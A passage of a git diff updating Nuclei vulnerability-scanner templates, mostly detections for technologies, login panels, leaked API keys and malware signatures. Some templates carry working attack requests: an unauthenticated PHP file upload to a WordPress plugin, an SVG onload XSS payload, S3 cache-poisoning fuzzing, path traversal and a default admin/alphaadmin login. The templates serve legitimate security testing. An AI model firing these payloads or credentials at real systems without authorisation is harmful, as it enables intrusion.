490a0046304402207fb28075cac9c1b3e06234ce965a9e715df9fd9d77688d7be5e867d37c08fb93022062bfb7fd3f956b5ddb44e1a53fd4df73afac4846df3ffe9835895ec2a4fa40a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/airtable-key.yaml b/nuclei-templates/Other/airtable-key.yaml index 20c3eb5596..e03a14db8b 100644 --- a/nuclei-templates/Other/airtable-key.yaml +++ b/nuclei-templates/Other/airtable-key.yaml @@ -9,8 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go metadata: verified: true - tags: airtable,file,token - + tags: keys,file,airtable,token file: - extensions: - all @@ -19,4 +18,5 @@ file: - type: regex part: body regex: - - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 490a004630440220673067de4dbbe1d9d4f9337d2eddd6903ed401646b5e2ef23b4cb4fbc15e4bb40220774a7aafc56f3023bd7d681d429badb45d714352a8fcb74844e5913b116cfce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ait-csv-import-export-rce.yaml b/nuclei-templates/Other/ait-csv-import-export-rce.yaml index 9a31a4d4e8..b09444699f 100644 --- a/nuclei-templates/Other/ait-csv-import-export-rce.yaml +++ b/nuclei-templates/Other/ait-csv-import-export-rce.yaml @@ -13,9 +13,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 9.8 cwe-id: CWE-434 + metadata: + max-request: 2 tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive -requests: +variables: + string: "ait-csv-import-export-rce" + +http: - raw: - | POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1 @@ -27,10 +32,9 @@ requests: Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Type: application/octet-stream - sep=; + sep=; --------------------------ab360007dbae2de8-- - - | GET /wp-content/uploads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} @@ -38,12 +42,7 @@ requests: matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - - "fe394b60dc324c3bac3060d600ad4349" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/22 + - '{{md5(string)}}' +# digest: 4a0a0047304502203dbe9ee0c251236f440cd8c6935333f6dc51bd895808da6870155c24df8c64b2022100b7821bd07973808a30f1871fc4551a454d614efd4f69739bbc1e53a87b4d2364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aj-report.yaml b/nuclei-templates/Other/aj-report.yaml new file mode 100644 index 0000000000..2135ab0cb8 --- /dev/null +++ b/nuclei-templates/Other/aj-report.yaml @@ -0,0 +1,20 @@ +id: aj-report +info: + name: aj-report + author: cn-kali-team + tags: detect,tech,aj-report + severity: info + metadata: + fofa-query: + - title="aj-report" + product: aj-report + vendor: anji-plus + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: regex + regex: + - (?mi)]*>aj-report.*? diff --git a/nuclei-templates/Other/akamai-arl-xss-248.yaml b/nuclei-templates/Other/akamai-arl-xss-248.yaml new file mode 100644 index 0000000000..9d1034a158 --- /dev/null +++ b/nuclei-templates/Other/akamai-arl-xss-248.yaml @@ -0,0 +1,31 @@ +id: akamai-arl-xss + +info: + name: Open Akamai ARL XSS + author: pdteam + severity: medium + tags: akamai,xss + reference: + - https://github.com/war-and-code/akamai-arl-hack + - https://twitter.com/SpiderSec/status/1421176297548435459 + - https://warandcode.com/post/akamai-arl-hack/ + - https://github.com/cybercdh/goarl + - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US + +requests: + - method: GET + path: + - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '">' + - 'Suggestions for improving the results' + + - type: word + part: header + words: + - 'text/html' \ No newline at end of file diff --git a/nuclei-templates/Other/akamai-arl-xss-249.yaml b/nuclei-templates/Other/akamai-arl-xss-249.yaml deleted file mode 100644 index 6a9c5fd334..0000000000 --- a/nuclei-templates/Other/akamai-arl-xss-249.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: akamai-arl-xss - -info: - name: Open Akamai ARL - Cross-Site Scripting - author: pdteam - severity: medium - reference: - - https://github.com/war-and-code/akamai-arl-hack - - https://twitter.com/SpiderSec/status/1421176297548435459 - - https://warandcode.com/post/akamai-arl-hack/ - - https://github.com/cybercdh/goarl - - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US - tags: akamai,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E" - - matchers-condition: and - matchers: - - type: word - condition: and - words: - - '">' - - 'Suggestions for improving the results' - - - type: word - part: header - words: - - 'text/html' diff --git a/nuclei-templates/Other/akamai-cache-detect.yaml b/nuclei-templates/Other/akamai-cache-detect.yaml index d79c43f010..44fab4d29d 100644 --- a/nuclei-templates/Other/akamai-cache-detect.yaml +++ b/nuclei-templates/Other/akamai-cache-detect.yaml @@ -5,23 +5,26 @@ info: author: nybble04 severity: info description: | - Sends a HEAD request with a Pragma header value of "akamai-x-cache-on" and looks for an akamai-specific response header value. + Sends a HEAD request with a Pragma header value of "akamai-x-cache-on" and looks for an akamai-specific response header value. reference: - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ metadata: verified: true + max-request: 1 tags: cache,akamai,tech -requests: +http: - method: HEAD path: - "{{BaseURL}}" + headers: Pragma: akamai-x-cache-on - matchers: - type: regex part: header regex: - '(?:TCP_HIT|TCP_MISS).*deploy\.akamaitechnologies\.com' + +# digest: 4a0a00473045022011341588cf8e4c3fef946497f57b95b143aa9947a35255c0c6c96b5a70d1ba8b022100910f3e2b59c3d46eacdebcf3a458b69e2f86333e12b96dcd775e0f5e48af45d0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/akamai-cloudtest.yaml b/nuclei-templates/Other/akamai-cloudtest-254.yaml similarity index 100% rename from nuclei-templates/Other/akamai-cloudtest.yaml rename to nuclei-templates/Other/akamai-cloudtest-254.yaml diff --git a/nuclei-templates/Other/akamai-detect.yaml b/nuclei-templates/Other/akamai-detect.yaml index 6befa6e7f2..5128bbfcdb 100644 --- a/nuclei-templates/Other/akamai-detect.yaml +++ b/nuclei-templates/Other/akamai-detect.yaml @@ -8,18 +8,21 @@ info: - https://support.globaldots.com/hc/en-us/articles/115003996705-Akamai-Pragma-Headers-overview - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ + metadata: + max-request: 1 tags: akamai,cdn,tech - -requests: +http: - method: GET path: - "{{BaseURL}}" + headers: Pragma: akamai-x-cache-on - matchers: - type: word part: x_cache words: - "deploy.akamai" + +# digest: 490a0046304402204cfdfcfd8138c730176b2d360e96b97de9785e215e4fa1c768574552e496d1ee02200ce0780445c2e3bd98b1b58aa75583c5b50957d2d9d1515743f898828ac02e02:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/akamai-s3-cache-poisoning.yaml b/nuclei-templates/Other/akamai-s3-cache-poisoning.yaml index 2eeded9ef0..3266ae65bd 100644 --- a/nuclei-templates/Other/akamai-s3-cache-poisoning.yaml +++ b/nuclei-templates/Other/akamai-s3-cache-poisoning.yaml @@ -1,20 +1,25 @@ id: akamai-s3-cache-poisoning info: - name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting + name: Akamai/Amazon S3 - Cache Poisoning author: DhiyaneshDk severity: high + description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ - https://owasp.org/www-community/attacks/Cache_Poisoning + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L + cvss-score: 7.1 + cwe-id: CWE-44 metadata: - verified: "true" - tags: cache,poisoning,generic,xss,akamai,s3 - + verified: true + max-request: 204 + tags: cache,poisoning,xss,akamai,s3,misconfig variables: rand: "{{rand_base(5)}}" -requests: +http: - raw: - |+ GET /nuclei.svg?{{rand}}=x HTTP/1.1 @@ -28,13 +33,12 @@ requests: attack: clusterbomb payloads: escape: - - "\x0b" - - "\x0c" + - "\v" + - "\f" - "\x1c" - "\x1d" - "\x1e" - "\x1f" - bucket: - "nuclei-ap-northeast-1" - "nuclei-ap-northeast-2" @@ -53,7 +57,6 @@ requests: - "nuclei-us-east-2" - "nuclei-us-west-1" - "nuclei-us-west-2" - stop-at-first-match: true unsafe: true matchers: @@ -62,3 +65,5 @@ requests: - 'contains(body_2, "alert(document.domain)")' - 'status_code_2 == 200' condition: and + +# digest: 490a0046304402205d755aa1fb1c07d6eac253f8ed760b27408545a8b3bd8104e6cb8298d05d720802204ffa53e1789ed44edb45fc98d3b03deaa7da5566a8bf3a3bce1b6ac03c1df145:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/akismet.yaml b/nuclei-templates/Other/akismet.yaml index 834d3be60a..f68ad2a6bf 100644 --- a/nuclei-templates/Other/akismet.yaml +++ b/nuclei-templates/Other/akismet.yaml @@ -1,7 +1,7 @@ id: wordpress-akismet info: - name: Akismet Spam Protection Detection + name: Akismet Anti-spam' Spam Protection Detection author: ricardomaia severity: info reference: @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/alfa-malware.yaml b/nuclei-templates/Other/alfa-malware.yaml index 3f794408ea..f04ebb7959 100644 --- a/nuclei-templates/Other/alfa-malware.yaml +++ b/nuclei-templates/Other/alfa-malware.yaml @@ -6,14 +6,14 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - "8B0C9781E1FFFF000081F919040000740F81F9" - "220400007407423BD07CE2EB02" condition: and + +# digest: 4a0a0047304502206fd1a4e1b8a904da814aa19c10249a96a98fa29233f922bab161e3b93d413a00022100a147f5f3a192423bda7f022ad0bb3dd91d1a8d321d9a6687c9da0ca35ce98476:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/alfacgiapi-wordpress-256.yaml b/nuclei-templates/Other/alfacgiapi-wordpress-256.yaml deleted file mode 100644 index f8d61143d9..0000000000 --- a/nuclei-templates/Other/alfacgiapi-wordpress-256.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/alfacgiapi-wordpress.yaml b/nuclei-templates/Other/alfacgiapi-wordpress.yaml new file mode 100644 index 0000000000..27d4456e69 --- /dev/null +++ b/nuclei-templates/Other/alfacgiapi-wordpress.yaml @@ -0,0 +1,32 @@ +id: alfacgiapi-wordpress + +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/alfresco-detect-258.yaml b/nuclei-templates/Other/alfresco-detect-258.yaml new file mode 100644 index 0000000000..bb8f41ee52 --- /dev/null +++ b/nuclei-templates/Other/alfresco-detect-258.yaml @@ -0,0 +1,33 @@ +id: alfresco-detect + +info: + name: Alfresco CMS Detection + author: pathtaga + severity: info + tags: alfresco,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' + + - type: word + part: header + words: + - "application/json" + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/nuclei-templates/Other/alfresco-detect-259.yaml b/nuclei-templates/Other/alfresco-detect-259.yaml deleted file mode 100644 index 0a9414afb1..0000000000 --- a/nuclei-templates/Other/alfresco-detect-259.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: alfresco-detect - -info: - name: Alfresco CMS Detection - author: pathtaga - description: Alfresco CMS was discovered. - severity: info - tags: alfresco,tech,panel - reference: - - https://www.alfresco.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' - - - type: word - part: header - words: - - "application/json" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/algolia-key.yaml b/nuclei-templates/Other/algolia-key.yaml index 7724867bb5..69d977c2c2 100644 --- a/nuclei-templates/Other/algolia-key.yaml +++ b/nuclei-templates/Other/algolia-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: algolia,file,keys - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a0047304502200114ce7db1c3fde42b20020e1d0ccddb88507568c665f21e1cdc8a7b722defdb022100c707d824ef36106683f16cc962e32ac899c727c5b22db59a7af8a4ab957a27d6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml b/nuclei-templates/Other/alibaba-anyproxy-fileread.yaml similarity index 100% rename from nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml rename to nuclei-templates/Other/alibaba-anyproxy-fileread.yaml diff --git a/nuclei-templates/Other/alibaba-anyproxy-lfi.yaml b/nuclei-templates/Other/alibaba-anyproxy-lfi.yaml index 8cd2bbe4a2..cdd42eafad 100644 --- a/nuclei-templates/Other/alibaba-anyproxy-lfi.yaml +++ b/nuclei-templates/Other/alibaba-anyproxy-lfi.yaml @@ -4,6 +4,7 @@ info: name: Alibaba Anyproxy fetchBody File - Path Traversal author: DhiyaneshDk severity: high + description: Alibaba Anyproxy is vulnerable to Path Traversal. reference: - https://github.com/alibaba/anyproxy/issues/391 - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md @@ -25,5 +26,4 @@ http: - contains(body, '\"id\":') - status_code == 200 condition: and - -# digest: 490a00463044022071555a9d1201d1e65a5a44e0e31a75e29ce4267145e86209b6cc9c257d19f87f022075d2405b30226fcf49b5b4d8a96f093ad88722ba598d8eeab0a2b60b517b3118:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022068deda934b82dc15a20aeece7b291bec783b3071a5e5e18902003c757c07b43802204c69872aeb22e0f649667a5e13377d6762a4a361898e5eac70d24b63bb360472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/alibaba-canal-default-password.yaml b/nuclei-templates/Other/alibaba-canal-default-password-262.yaml similarity index 100% rename from nuclei-templates/Other/alibaba-canal-default-password.yaml rename to nuclei-templates/Other/alibaba-canal-default-password-262.yaml diff --git a/nuclei-templates/Other/alibaba-key-id.yaml b/nuclei-templates/Other/alibaba-key-id.yaml index faeed4e86a..bb4c46c490 100644 --- a/nuclei-templates/Other/alibaba-key-id.yaml +++ b/nuclei-templates/Other/alibaba-key-id.yaml @@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 490a0046304402202a929c5a7c56fdcba6baf8a05f5ee26de1dc68039a330a33dba7e6973876605b0220499fe8d24c2d03e30f7ffa4077775380ea6b237262bfdc1319821135d3bf0faf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml b/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml index 23048a649f..6de46b6ec7 100644 --- a/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml +++ b/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml @@ -4,7 +4,7 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth,alibaba + tags: mongoshake,unauth requests: - method: GET diff --git a/nuclei-templates/Other/alibaba-secret-id.yaml b/nuclei-templates/Other/alibaba-secret-id.yaml index 9324354baf..2bd7d4389a 100644 --- a/nuclei-templates/Other/alibaba-secret-id.yaml +++ b/nuclei-templates/Other/alibaba-secret-id.yaml @@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 4b0a0048304602210087f98e454e5064757753028db3f4a280d96ee2ba47163b503031bb9000820d73022100f8348ca58ad2ee80dba4b7ccbca37a95b7ba44742a4f0ed2f5fd64b952843ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/alienspy-malware.yaml b/nuclei-templates/Other/alienspy-malware.yaml index bd5ead14b3..5a35a25748 100644 --- a/nuclei-templates/Other/alienspy-malware.yaml +++ b/nuclei-templates/Other/alienspy-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -22,4 +20,6 @@ file: - "password.ini" - "stub/stub.dll" - "c.dat" - condition: and \ No newline at end of file + condition: and + +# digest: 4b0a0048304602210099bae7391b6cf2278da97789c2cb44af6ea6a4983b92016e59a3456fa593335f022100cbc010d1b5dff13672cb5c07314431e7f74d24f8bc0c2035185d3c08269a3be3:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/alienvault-usm-274.yaml b/nuclei-templates/Other/alienvault-usm-274.yaml index ded506566b..cad5bd5dc5 100644 --- a/nuclei-templates/Other/alienvault-usm-274.yaml +++ b/nuclei-templates/Other/alienvault-usm-274.yaml @@ -1,12 +1,18 @@ id: alienVault-usm info: - name: AlienVault USM + name: AlienVault USM Login Panel author: dhiyaneshDK severity: info tags: panel,alienvault + description: An AlienVault USM login panel was detected. metadata: shodan-query: 'http.title:"AlienVault USM"' + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/alina-malware.yaml b/nuclei-templates/Other/alina-malware.yaml index 9b4f6141e0..98a994dc65 100644 --- a/nuclei-templates/Other/alina-malware.yaml +++ b/nuclei-templates/Other/alina-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Alina.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -18,4 +16,6 @@ file: - 'Alina v1.0' - 'POST' - '1[0-2])[0-9]' - condition: and \ No newline at end of file + condition: and + +# digest: 4b0a00483046022100a267b4decff9664b60695730319caed7c613138a358e3697b3e1b0566b20872c022100cf3ac7fafc2bed1b5d599729fcde42a0ac732f400b015a260b1a493fe8e8c193:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/all-404-redirect-to-homepage.yaml b/nuclei-templates/Other/all-404-redirect-to-homepage.yaml index 47b14549c1..9c340e8422 100644 --- a/nuclei-templates/Other/all-404-redirect-to-homepage.yaml +++ b/nuclei-templates/Other/all-404-redirect-to-homepage.yaml @@ -1,19 +1,19 @@ id: wordpress-all-404-redirect-to-homepage info: - name: All 404 Redirect to Homepage & Broken images Redirection Detection + name: All 404 Redirect to Homepage Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 -requests: +http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" @@ -47,3 +47,5 @@ requests: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009a1f00db570e0862b0c2e0430ee4957a6f96b1fe23a276f80eb7820aba82f1df022100f8f0e9b975f46c0ebc8c12bc7e9b6e007be1326bcb9af6b02631d492b3752149:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/all-in-one-seo-pack.yaml b/nuclei-templates/Other/all-in-one-seo-pack.yaml index 141b18afbd..8addc28ded 100644 --- a/nuclei-templates/Other/all-in-one-seo-pack.yaml +++ b/nuclei-templates/Other/all-in-one-seo-pack.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/all-in-one-wp-migration.yaml b/nuclei-templates/Other/all-in-one-wp-migration.yaml index 70137d7ce6..55362630df 100644 --- a/nuclei-templates/Other/all-in-one-wp-migration.yaml +++ b/nuclei-templates/Other/all-in-one-wp-migration.yaml @@ -1,7 +1,7 @@ id: wordpress-all-in-one-wp-migration info: - name: All-in-One WP Migration Detection + name: All-in-One WP Migration and Backup Detection author: ricardomaia severity: info reference: @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/all-in-one-wp-security-and-firewall.yaml b/nuclei-templates/Other/all-in-one-wp-security-and-firewall.yaml index 1789c98b1f..41e297ffeb 100644 --- a/nuclei-templates/Other/all-in-one-wp-security-and-firewall.yaml +++ b/nuclei-templates/Other/all-in-one-wp-security-and-firewall.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/allied-telesis-exposure.yaml b/nuclei-templates/Other/allied-telesis-exposure.yaml index e151402c41..b8e48488e2 100644 --- a/nuclei-templates/Other/allied-telesis-exposure.yaml +++ b/nuclei-templates/Other/allied-telesis-exposure.yaml @@ -9,14 +9,16 @@ info: - https://www.alliedtelesis.com/in/en classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 + product: device_gui shodan-query: title:"Allied Telesis Device GUI" - tags: panel,allied + vendor: allied_telesis + verified: true + tags: panel,allied,allied_telesis -requests: +http: - method: GET path: - "{{BaseURL}}/public/login.html" @@ -36,5 +38,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/09 +# digest: 4a0a00473045022100ee028fb7d8d6ac97c18dca4a3bfad7955ccd4c636f8a6fc017f2ff150f56700302207da21269f555a6a7ac988509c3799af6823420b112f4879cc9a9c7ae7e775b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/alpha-malware.yaml b/nuclei-templates/Other/alpha-malware.yaml index 667414d798..8e1c21699a 100644 --- a/nuclei-templates/Other/alpha-malware.yaml +++ b/nuclei-templates/Other/alpha-malware.yaml @@ -6,12 +6,12 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - "520065006100640020004D0065002000280048006F00770020004400650063" + +# digest: 4a0a004730450221009b5e9aa41a25cb5d9482c691f43bb6f1711b5a6907c684034f43192929520cb20220085710f5e83b940ae1e8defff1687753b6525289356cf579f3108a1a10620b52:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/alphaweb-default-login-275.yaml b/nuclei-templates/Other/alphaweb-default-login-275.yaml new file mode 100644 index 0000000000..f3bccdcc96 --- /dev/null +++ b/nuclei-templates/Other/alphaweb-default-login-275.yaml @@ -0,0 +1,38 @@ +id: alphaweb-default-login +info: + name: AlphaWeb XE Default Login + author: Lark Lab + severity: medium + description: An AlphaWeb XE default login was discovered. + reference: + - https://wiki.zenitel.com/wiki/AlphaWeb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: default-login,AlphaWeb +requests: + - raw: + - | + GET /php/node_info.php HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Referer: {{BaseURL}} + attack: pitchfork + payloads: + username: + - admin + password: + - alphaadmin + matchers-condition: and + matchers: + - type: word + words: + - "HW Configuration" + - "SW Configuration" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/alphaweb-default-login-277.yaml b/nuclei-templates/Other/alphaweb-default-login-277.yaml deleted file mode 100644 index 6532087439..0000000000 --- a/nuclei-templates/Other/alphaweb-default-login-277.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: alphaweb-default-login - -info: - name: AlphaWeb XE Default Login - author: Lark Lab - severity: medium - tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb - -requests: - - raw: - - | - GET /php/node_info.php HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Referer: 